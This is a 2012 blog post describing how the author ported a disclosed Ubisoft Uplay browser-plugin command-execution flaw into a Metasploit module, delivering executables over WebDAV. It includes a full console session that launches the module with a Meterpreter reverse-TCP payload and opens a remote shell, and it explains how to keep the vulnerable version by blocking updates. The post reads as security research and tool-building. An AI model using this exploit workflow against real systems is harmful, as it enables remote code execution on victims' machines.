Tuesday 31 July 2012

Ubisoft Browser Plugin Exploit

As an exercise in developing for Metasploit myself and a couple of colleagues attempted to port the recent Ubisoft ActiveX Plugin Command Execution Exploit (versions <= 2.03) disclosed by Tavis Ormandy: http://seclists.org/fulldisclosure/2012/Jul/375

Its a very simple exploit, as it just takes the path to an exe and loads it for you, no memory corruption to worry about. Our initial attempt would just run any local executable, and whilst developing this Ubisoft pushed out a very swift patch to prevent this flaw.

Its still possible to use the old installer for 2.03, disconnect from the internet to prevent the update process, login, and set uplay into offline mode to prevent further updates. This also means there might be a few souls out there still running vulnerable versions but they will be few and far between.

It did not work in Windows 7 but happily in Windows XP. Not sure why this is but nevermind. Tested it in IE should theoretically work in other browsers but they generally did not have the plugin registered.

Further feedback from Rapid7's Sinn3r suggested using WebDAV to deliver the payload rather than limiting to just local files, so I butchered webdav_dll_hijacker.rb to serve exes. Had a few problems in that when requesting the exe it would then try and request xxx.exe.Manifest and DLLs corrupting the executable, but with a helpful hint from HDM to serve these with a 404 request it was off and running:
 _                                                      _
/  \  / \        __                          _   __    /_/ __
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\


       =[ metasploit v4.4.0-release [core:4.4 api:1.0]
+ -- --=[ 917 exploits - 495 auxiliary - 150 post
+ -- --=[ 250 payloads - 28 encoders - 8 nops

msf > use exploit/windows/browser/ubisoft_uplay_cmd_exec
msf  exploit(ubisoft_uplay_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ubisoft_uplay_cmd_exec) > set LHOST 192.168.1.45
LHOST => 192.168.1.45
msf  exploit(ubisoft_uplay_cmd_exec) > exploit
[*] Exploit running as background job.
msf  exploit(ubisoft_uplay_cmd_exec) >
[*] Started reverse handler on 192.168.1.45:4444
[*] Exploit URI: http://192.168.1.45:80/kcomPoOs
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.45:80/
[*] Server started.
[*] 192.168.1.45     ubisoft_uplay_cmd_exec - GET => Exploit
[*] 192.168.1.45     ubisoft_uplay_cmd_exec - GET => Payload
[*] Sending stage (752128 bytes) to 192.168.1.45
[*] Meterpreter session 1 opened (192.168.1.45:4444 -> 192.168.1.45:3762) at 2012-07-31 20:45:15 +0100

Hopefully be included in the main trunk but unlikely to get any real world shells with it due to Ubisoft's swift turnaround! https://github.com/rapid7/metasploit-framework/pull/653

No comments:

Post a Comment